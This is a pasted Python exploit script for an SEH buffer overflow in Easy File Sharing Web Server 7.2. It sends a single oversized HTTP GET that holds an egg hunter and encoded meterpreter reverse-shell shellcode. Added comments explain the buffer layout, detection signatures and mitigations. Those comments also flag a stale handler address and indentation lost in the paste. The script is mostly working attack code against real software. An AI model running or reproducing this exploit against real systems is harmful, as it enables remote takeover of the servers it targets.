
Easy File Sharing Web Server 7.2 SEH Buffer Overflow

a guest
Feb 19th, 2018
  1. #!/usr/bin/python
  2.  
  3. # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter)
  4. # Date: 2016/8/31
  5. # Exploit Author: Iran Cyber Security Group
  6. # Vendor Homepage: http://www.sharing-file.com
  7. # Software Link: http://www.sharing-file.com/efssetup.exe
  8. # Version: 7.2 [LATEST]
  9. # Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems]
  10. # CVE : N/A
  11. # Usage : python exploit.py [IP or Domain]
  12.  
  13. # Discovered By Arash Khazaei (AKA XoDiAK)
  14. # Greetz To Iran Cyber Members & My Friends
  15.  
  16. import sys,socket
  17. from struct import pack
  18.  
  # Target selection: the host is taken unchecked from the first command-line
  # argument (a missing argument raises IndexError); the port is fixed at 80.
  19. HOST = sys.argv[1]
  20. PORT = 80
  21. # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte
  22. # Replace It With Your Own Shellcode !
  23.  
  # Payload blob. Per the author's comment above it is encoder output with the
  # bytes 0x2f ('/') and 0x5c ('\') excluded, presumably because they are
  # significant inside a request path (not shown here; confirm against the server).
  # The encoded bytes are opaque in this listing, so the payload's callback
  # parameters cannot be read from the page.
  # The blob is prefixed with the 8-byte ASCII tag "w00tw00t", which is the marker
  # the egg hunter defined later in this script scans memory for.
  # Detection: the literal tag "w00tw00t" inside an HTTP request line is a
  # high-signal string for IDS/WAF rules and for web-server log review.
  24. shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
  25. "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1"
  26. "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d"
  27. "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61"
  28. "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79"
  29. "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32"
  30. "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9"
  31. "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f"
  32. "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85"
  33. "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7"
  34. "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab"
  35. "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3"
  36. "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31"
  37. "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba"
  38. "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11"
  39. "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90"
  40. "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e"
  41. "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09"
  42. "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a"
  43. "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59"
  44. "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb"
  45. "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b"
  46. "\x98\x35\x70\x3b\xe0")
  47.  
  48.  
  # Request-target layout: filler, an overwritten SEH record (next-handler field,
  # then handler pointer), the egg hunter stub, and the tagged payload.
  # The weakness on the server side is an unbounded copy of the request target;
  # the filler length is the author's measured distance to the SEH record.
  49. # Padding !
  50. junk = "A" * 4061
  51. # Next SEH
  # Four bytes placed in the "next handler" field: 0xEB 0x06 is an x86 short
  # jump of six bytes, followed by two 0x90 (NOP) bytes.
  52. nseh = "\xeb\x06\x90\x90"
  53.  
  54. # 0x1000108b [ImageLoader.dll] POP POP RET
  # NOTE(review): the address in the comment above (0x1000108b) is not the value
  # packed below (0x10018848); one of the two is stale - confirm.
  # pack('<L', ...) emits the value as a little-endian unsigned 32-bit integer.
  # Mitigation: a fixed handler address inside a bundled DLL only helps an
  # overwrite when that module is loaded without SafeSEH/ASLR (presumably the
  # case for the named DLL - verify); SEHOP and DEP on the host also constrain
  # this class of SEH overwrite.
  55. seh = pack('<L', 0x10018848)
  56.  
  57. # Egg Hunter 32 Byte Tag = w00tw00t
  # 32-byte stub (two runs of 16 bytes). It embeds \x77\x30\x30\x74, the ASCII
  # string "w00t", matching the tag that prefixes the payload blob.
  58. egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
  59. "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  60.  
  # The trailing "\x90" multiplier is 4061-4-4-32-8-335-5000 = -1322; Python
  # yields an empty string for a negative repeat count, so nothing is appended.
  # The request target is therefore about 4.4 KB if the payload is the 335 bytes
  # the author states.
  # Detection: a request line of several kilobytes made mostly of a repeated 'A'
  # byte and containing non-ASCII bytes; capping request-line length at a proxy
  # in front of the service blocks requests of this shape.
  61. exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000)
  # Delivery: one TCP connection to HOST:PORT, a single HTTP/1.0 GET whose
  # request target is the assembled buffer, then close without reading a reply.
  # Python 2 syntax (print statements, byte strings sent as str).
  # NOTE(review): indentation was lost in this paste, so the try/except bodies do
  # not parse as shown, and it cannot be told from here whether the final print
  # sits inside the except branch or after it.
  # The bare except catches every exception, not only connection failures, so
  # the printed message does not identify the actual error.
  # Server-side trace: a single oversized GET from the client, typically
  # followed by a crash or restart of the web-server process if the overflow
  # is triggered - TODO confirm against the product's own logs.
  62. try:
  63. s = socket.socket()
  64. s.connect((HOST, PORT))
  65. s.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
  66. s.close()
  67. except:
  68. print "Can't Connect To Web Server ! Is it up ?"
  69. print "Evil Buffer Sended Successfully!"